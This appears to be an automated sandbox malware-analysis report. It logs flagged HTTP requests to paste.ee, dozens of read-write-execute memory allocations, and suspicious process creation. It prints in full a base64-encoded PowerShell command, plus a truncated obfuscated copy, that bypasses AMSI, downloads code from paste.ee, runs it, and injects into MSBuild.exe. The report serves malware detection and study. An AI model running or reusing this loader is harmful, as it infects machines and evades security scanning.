suspicious_features	GET method with no useragent header	suspicious_request	GET https://paste.ee/r/oSlYJ
suspicious_features	GET method with no useragent header	suspicious_request	GET https://paste.ee/r/p7EHC
suspicious_features	POST method with no referer header	suspicious_request	POST https://update.googleapis.com/service/update2?cup2key=10:2713802909&cup2hreq=8cab5512950206d82ca4581cc9d1ccfba8c54dfd64bf2baf0aa7e90da4734256

Performs some HTTP requests (6 events)

request	HEAD http://edgedl.gvt1.com/edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe
request	GET http://edgedl.gvt1.com/edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe
request	GET https://paste.ee/r/oSlYJ
request	GET https://paste.ee/r/p7EHC
request	GET https://clients2.google.com/service/check2?crx3=true&appid=%7B430FD4D0-B729-4F61-AA34-91526481799D%7D&appversion=1.3.36.32&applang=&machine=1&version=1.3.36.32&userid=&osversion=6.1&servicepack=Service%20Pack%201
request	POST https://update.googleapis.com/service/update2?cup2key=10:2713802909&cup2hreq=8cab5512950206d82ca4581cc9d1ccfba8c54dfd64bf2baf0aa7e90da4734256

Sends data using the HTTP POST Method (1 event)

request

POST https://update.googleapis.com/service/update2?cup2key=10:2713802909&cup2hreq=8cab5512950206d82ca4581cc9d1ccfba8c54dfd64bf2baf0aa7e90da4734256

Allocates read-write-execute memory (usually to unpack itself) (50 out of 284 events)

Time & API	Arguments	Status
NtProtectVirtualMemory April 22, 2021, 5:19 p.m.	process_identifier: 5580 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73772000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 22, 2021, 5:19 p.m.	process_identifier: 2352 region_size: 1769472 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02990000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 22, 2021, 5:19 p.m.	process_identifier: 2352 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b00000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory April 22, 2021, 5:19 p.m.	process_identifier: 2352 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6fc91000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 22, 2021, 5:19 p.m.	process_identifier: 2352 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01eca000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory April 22, 2021, 5:19 p.m.	process_identifier: 2352 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6fc92000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 22, 2021, 5:19 p.m.	process_identifier: 2352 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01ec2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 22, 2021, 5:19 p.m.	process_identifier: 2352 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01ed2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 22, 2021, 5:19 p.m.	process_identifier: 2352 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b01000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 22, 2021, 5:19 p.m.	process_identifier: 2352 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b02000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 22, 2021, 5:19 p.m.	process_identifier: 2352 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0203a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 22, 2021, 5:19 p.m.	process_identifier: 2352 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01ed3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 22, 2021, 5:19 p.m.	process_identifier: 2352 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01ed4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 22, 2021, 5:19 p.m.	process_identifier: 2352 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0208b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 22, 2021, 5:19 p.m.	process_identifier: 2352 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02087000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 22, 2021, 5:19 p.m.	process_identifier: 2352 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01ecb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 22, 2021, 5:19 p.m.	process_identifier: 2352 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02032000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 22, 2021, 5:19 p.m.	process_identifier: 2352 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02085000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 22, 2021, 5:19 p.m.	process_identifier: 2352 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01ed5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 22, 2021, 5:19 p.m.	process_identifier: 2352 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0203c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 22, 2021, 5:19 p.m.	process_identifier: 2352 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028e0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 22, 2021, 5:19 p.m.	process_identifier: 2352 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01ed6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 22, 2021, 5:19 p.m.	process_identifier: 2352 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0208c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 22, 2021, 5:19 p.m.	process_identifier: 2352 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02033000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 22, 2021, 5:19 p.m.	process_identifier: 2352 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02034000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 22, 2021, 5:19 p.m.	process_identifier: 2352 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02035000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 22, 2021, 5:19 p.m.	process_identifier: 2352 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02036000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 22, 2021, 5:19 p.m.	process_identifier: 2352 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02037000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 22, 2021, 5:19 p.m.	process_identifier: 2352 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02038000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 22, 2021, 5:19 p.m.	process_identifier: 2352 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02039000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 22, 2021, 5:19 p.m.	process_identifier: 2352 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ae0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 22, 2021, 5:19 p.m.	process_identifier: 2352 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ae1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 22, 2021, 5:19 p.m.	process_identifier: 2352 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ae2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 22, 2021, 5:19 p.m.	process_identifier: 2352 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ae3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 22, 2021, 5:19 p.m.	process_identifier: 2352 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ae4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 22, 2021, 5:19 p.m.	process_identifier: 2352 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ae5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 22, 2021, 5:19 p.m.	process_identifier: 2352 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ae6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 22, 2021, 5:19 p.m.	process_identifier: 2352 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ae7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 22, 2021, 5:19 p.m.	process_identifier: 2352 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ae8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 22, 2021, 5:19 p.m.	process_identifier: 2352 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ae9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 22, 2021, 5:19 p.m.	process_identifier: 2352 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02aea000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 22, 2021, 5:19 p.m.	process_identifier: 2352 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02aeb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 22, 2021, 5:19 p.m.	process_identifier: 2352 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02aec000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 22, 2021, 5:19 p.m.	process_identifier: 2352 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02aed000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 22, 2021, 5:19 p.m.	process_identifier: 2352 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02aee000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 22, 2021, 5:19 p.m.	process_identifier: 2352 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02aef000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 22, 2021, 5:19 p.m.	process_identifier: 2352 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02af0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 22, 2021, 5:19 p.m.	process_identifier: 2352 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02af1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 22, 2021, 5:19 p.m.	process_identifier: 2352 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02af2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 22, 2021, 5:19 p.m.	process_identifier: 2352 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02af3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates a shortcut to an executable file (1 event)

file	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (2 events)

cmdline

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -w 1 /e WwBkAG8AdQBiAGwAZQBdACQAbwBzAHYAZQByACAAPQAgAFsAcwB0AHIAaQBuAGcAXQBbAGUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBPAFMAVgBlAHIAcwBpAG8AbgAuAFYAZQByAHMAaQBvAG4ALgBtAGEAagBvAHIAIAArACAAJwAuACcAIAArACAAWwBlAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoATwBTAFYAZQByAHMAaQBvAG4ALgBWAGUAcgBzAGkAbwBuAC4AbQBpAG4AbwByADsAaQBmACAAKAAkAG8AcwB2AGUAcgAgAC0AZwBlACAAMQAwAC4AMAApACAAewBlAGMAaABvACAAVwBpAG4AZABvAHcAcwAxADAAOwAkAEUAVwBBAEEARAA9AFsAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMALgBNAGEAcgBzAGgAYQBsAF0AOgA6AEEAbABsAG8AYwBIAEcAbABvAGIAYQBsACgAKAAzADYAKwA5ADAANAAwACkAKQA7AFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAiAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgAkACgAWwBDAGgAYQBSAF0AKAAzADMAKwAzADIAKQArAFsAYwBoAGEAcgBdACgAWwBiAFkAdABlAF0AMAB4ADYARAApACsAWwBjAGgAQQByAF0AKABbAEIAWQBUAGUAXQAwAHgANwAzACkAKwBbAEMAaABhAHIAXQAoAFsAQgB5AHQAZQBdADAAeAA2ADkAKQApAFUAdABpAGwAcwAiACkALgBHAGUAdABGAGkAZQBsAGQAKAAiACQAKABbAHMAWQBzAFQARQBNAC4AbgBlAHQALgBXAEUAYgB1AHQASQBsAGkAdAB5AF0AOgA6AEgAVABNAEwAZABlAEMATwBkAGUAKAAnACYAIwA5ADcAOwAmACMAMQAwADkAOwAmACMAMQAxADUAOwAmACMAMQAwADUAOwAnACkAKQBTAGUAcwBzAGkAbwBuACIALAAgACIATgAiACsAIgBvACIAKwAiAG4AIgArACIAUAAiACsAIgB1ACIAKwAiAGIAIgArACIAbAAiACsAIgBpACIAKwAiAGMAIgArACIALAAiACsAIgBTACIAKwAiAHQAIgArACIAYQAiACsAIgB0ACIAKwAiAGkAIgArACIAYwAiACkALgBTAGUAdABWAGEAbAB1AGUAKAAkAG4AdQBsAGwALAAgACQAbgB1AGwAbAApADsAWwBSAGUAZgBdAC4AQQBzAHMAZQBtAGIAbAB5AC4ARwBlAHQAVAB5AHAAZQAoACIAUwAiACsAIgB5ACIAKwAiAHMAIgArACIAdAAiACsAIgBlACIAKwAiAG0AIgArACIALgAiACsAIgBNACIAKwAiAGEAIgArACIAbgAiACsAIgBhACIAKwAiAGcAIgArACIAZQAiACsAIgBtACIAKwAiAGUAIgArACIAbgAiACsAIgB0ACIAKwAiAC4AIgArACIAQQAiACsAIgB1ACIAKwAiAHQAIgArACIAbwAiACsAIgBtACIAKwAiAGEAIgArACIAdAAiACsAIgBpAG8AIgArACIAbgAuACQAKABbAEMAaABhAFIAXQAoADMAMwArADMAMgApACsAWwBjAGgAYQByAF0AKABbAGIAWQB0AGUAXQAwAHgANgBEACkAKwBbAGMAaABBAHIAXQAoAFsAQgBZAFQAZQBdADAAeAA3ADMAKQArAFsAQwBoAGEAcgBdACgAWwBCAHkAdABlAF0AMAB4ADYAOQApACkAIgArACIAVQAiACsAIgB0ACIAKwAiAGkAIgArACIAbAAiACsAIgBzACIAKQAuAEcAZQB0AEYAaQBlAGwAZAAoACIAJAAoAFsAcwBZAHMAVABFAE0ALgBuAGUAdAAuAFcARQBiAHUAdABJAGwAaQB0AHkAXQA6ADoASABUAE0ATABkAGUAQwBPAGQAZQAoACcAJgAjADkANwA7ACYAIwAxADAAOQA7ACYAIwAxADEANQA7ACYAIwAxADAANQA7ACcAKQApACIAKwAiAEMAIgArACIAbwAiACsAIgBuACIAKwAiAHQAIgArACIAZQAiACsAIgB4ACIAKwAiAHQAIgAsACAAIgBOACIAKwAiAG8AIgArACIAbgAiACsAIgBQACIAKwAiAHUAIgArACIAYgAiACsAIgBsACIAKwAiAGkAIgArACIAYwAsAFMAIgArACIAdAAiACsAIgBhACIAKwAiAHQAIgArACIAaQAiACsAIgBjACIAKQAuAFMAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAAsACAAWwBJAG4AdABQAHQAcgBdACQARQBXAEEAQQBEACkAOwB9AGUAbABzAGUAIAB7AH0AOwANAAoAJAByAGUAZwAgAD0AIAAoACcAewAyAH0AewAwAH0AewAxAH0AewAzAH0AJwAtAGYAJwBkAFMAdAAnACwAJwByAGkAbgAnACwAHCBgAEQAYABvAGAAdwBuAGAAbABgAG8AYQAdICwAJwBnACcAKQA7AFsAdgBvAGkAZABdACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZABXAGkAdABoAFAAYQByAHQAaQBhAGwATgBhAG0AZQAoACcATQBpAGMAcgBvAHMAbwBmAHQALgBWAGkAcwB1AGEAbABCAGEAcwBpAGMAJwApADsAJABmAGoAPQBbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4ASQBuAHQAZQByAGEAYwB0AGkAbwBuAF0AOgA6AEMAYQBsAGwAQgB5AG4AYQBtAGUAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALAAkAHIAZQBnACwAWwBNAGkAYwByAG8AcwBvAGYAdAAuAFYAaQBzAHUAYQBsAEIAYQBzAGkAYwAuAEMAYQBsAGwAVAB5AHAAZQBdADoAOgBNAGUAdABoAG8AZAAsACcAaAB0AHQAJwArAFsAQwBoAGEAcgBdADgAMAArACcAcwAnACAAKwAgAFsAQwBoAGEAcgBdADUAOAAgACsAIAAnAC8ALwBwAGEAcwB0AGUALgBlAGUALwByAC8AbwBTAGwAWQBKACcAKQB8AEkARQBYADsAWwBCAHkAdABlAFsAXQBdACQAZgA9AFsATQBpAGMAcgBvAHMAbwBmAHQALgBWAGkAcwB1AGEAbABCAGEAcwBpAGMALgBJAG4AdABlAHIAYQBjAHQAaQBvAG4AXQA6ADoAQwBhAGwAbABCAHkAbgBhAG0AZQAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgABwgYABOAGAAZQBgAFQAYAAuAGAAVwBgAGUAYABCAGAAQwBgAGwAYABpAGAAZQBgAE4AYABUAB0gKQAsACQAcgBlAGcALABbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4AQwBhAGwAbABUAHkAcABlAF0AOgA6AE0AZQB0AGgAbwBkACwAJwBoAHQAdAAnACsAWwBDAGgAYQByAF0AOAAwACsAJwBzACcAIAArACAAWwBDAGgAYQByAF0ANQA4ACAAKwAgACcALwAvAHAAYQBzAHQAZQAuAGUAZQAvAHIALwBwADcARQBIAEMAJwApAC4AcgBlAHAAbABhAGMAZQAoACcAJAAkACcALAAnADAAeAAnACkAfABJAEUAWAA7AFsAWQAuAE0AXQA6ADoAUQAoACcATQBTAEIAdQBpAGwAZAAuAGUAeABlACcALAAkAGYAKQA7AA==

cmdline

powershell.exe PowERsHEL`l -ExecutionPolicy Bypass -w 1 /`e WwBkAG8AdQBiAGwAZQBdACQAbwBzAHYAZQByACAAPQAgAFsAcwB0AHIAaQBuAGcAXQBbAGUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBPAFMAVgBlAHIAcwBpAG8AbgAuAFYAZQByAHMAaQBvAG4ALgBtAGEAagBvAHIAIAArACAAJwAuACcAIAArACAAWwBlAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoATwBTAFYAZQByAHMAaQBvAG4ALgBWAGUAcgBzAGkAbwBuAC4AbQBpAG4AbwByADsAaQBmACAAKAAkAG8AcwB2AGUAcgAgAC0AZwBlACAAMQAwAC4AMAApACAAewBlAGMAaABvACAAVwBpAG4AZABvAHcAcwAxADAAOwAkAEUAVwBBAEEARAA9AFsAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMALgBNAGEAcgBzAGgAYQBsAF0AOgA6AEEAbABsAG8AYwBIAEcAbABvAGIAYQBsACgAKAAzADYAKwA5ADAANAAwACkAKQA7AFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAiAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgAkACgAWwBDAGgAYQBSAF0AKAAzADMAKwAzADIAKQArAFsAYwBoAGEAcgBdACgAWwBiAFkAdABlAF0AMAB4ADYARAApACsAWwBjAGgAQQByAF0AKABbAEIAWQBUAGUAXQAwAHgANwAzACkAKwBbAEMAaABhAHIAXQAoAFsAQgB5AHQAZQBdADAAeAA2ADkAKQApAFUAdABpAGwAcwAiACkALgBHAGUAdABGAGkAZQBsAGQAKAAiACQAKABbAHMAWQBzAFQARQBNAC4AbgBlAHQALgBXAEUAYgB1AHQASQBsAGkAdAB5AF0AOgA6AEgAVABNAEwAZABlAEMATwBkAGUAKAAnACYAIwA5ADcAOwAmACMAMQAwADkAOwAmACMAMQAxADUAOwAmACMAMQAwADUAOwAnACkAKQBTAGUAcwBzAGkAbwBuACIALAAgACIATgAiACsAIgBvACIAKwAiAG4AIgArACIAUAAiACsAIgB1ACIAKwAiAGIAIgArACIAbAAiACsAIgBpACIAKwAiAGMAIgArACIALAAiACsAIgBTACIAKwAiAHQAIgArACIAYQAiACsAIgB0ACIAKwAiAGkAIgArACIAYwAiACkALgBTAGUAdABWAGEAbAB1AGUAKAAkAG4AdQBsAGwALAAgACQAbgB1AGwAbAApADsAWwBSAGUAZgBdAC4AQQBzAHMAZQBtAGIAbAB5AC4ARwBlAHQAVAB5AHAAZQAoACIAUwAiACsAIgB5ACIAKwAiAHMAIgArACIAdAAiACsAIgBlACIAKwAiAG0AIgArACIALgAiACsAIgBNACIAKwAiAGEAIgArACIAbgAiACsAIgBhACIAKwAiAGcAIgArACIAZQAiACsAIgBtACIAKwAiAGUAIgArACIAbgAiACsAIgB0ACIAKwAiAC4AIgArACIAQQAiACsAIgB1ACIAKwAiAHQAIgArACIAbwAiACsAIgBtACIAKwAiAGEAIgArACIAdAAiACsAIgBpAG8AIgArACIAbgAuACQAKABbAEMAaABhAFIAXQAoADMAMwArADMAMgApACsAWwBjAGgAYQByAF0AKABbAGIAWQB0AGUAXQAwAHgANgBEACkAKwBbAGMAaABBAHIAXQAoAFsAQgBZAFQAZQBdADAAeAA3ADMAKQArAFsAQwBoAGEAcgBdACgAWwBCAHkAdABlAF0AMAB4ADYAOQApACkAIgArACIAVQAiACsAIgB0ACIAKwAiAGkAIgArACIAbAAiACsAIgBzACIAKQAuAEcAZQB0AEYAaQBlAGwAZAAoACIAJAAoAFsAcwBZAHMAVABFAE0ALgBuAGUAdAAuAFcARQBiAHUAdABJAGwAaQB0AHkAXQA6ADoASABUAE0ATABkAGUAQwBPAGQAZQAoACcAJgAjADkANwA7ACYAIwAxADAAOQA7ACYAIwAxADEANQA7ACYAIwAxADAANQA7ACcAKQApACIAKwAiAEMAIgArACIAbwAiACsAIgBuACIAKwAiAHQAIgArACIAZQAiACsAIgB4ACIAKwAiAHQAIgAsACAAIgBOACIAKwAiAG8AIgArACIAbgAiACsAIgBQACIAKwAiAHUAIgArACIAYgAiACsAIgBsACIAKwAiAGkAIgArACIAYwAsAFMAIgArACIAdAAiACsAIgBhACIAKwAiAHQAIgArACIAaQAiACsAIgBjACIAKQAuAFMAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAAsACAAWwBJAG4AdABQAHQAcgBdACQARQBXAEEAQQBEACkAOwB9AGUAbABzAG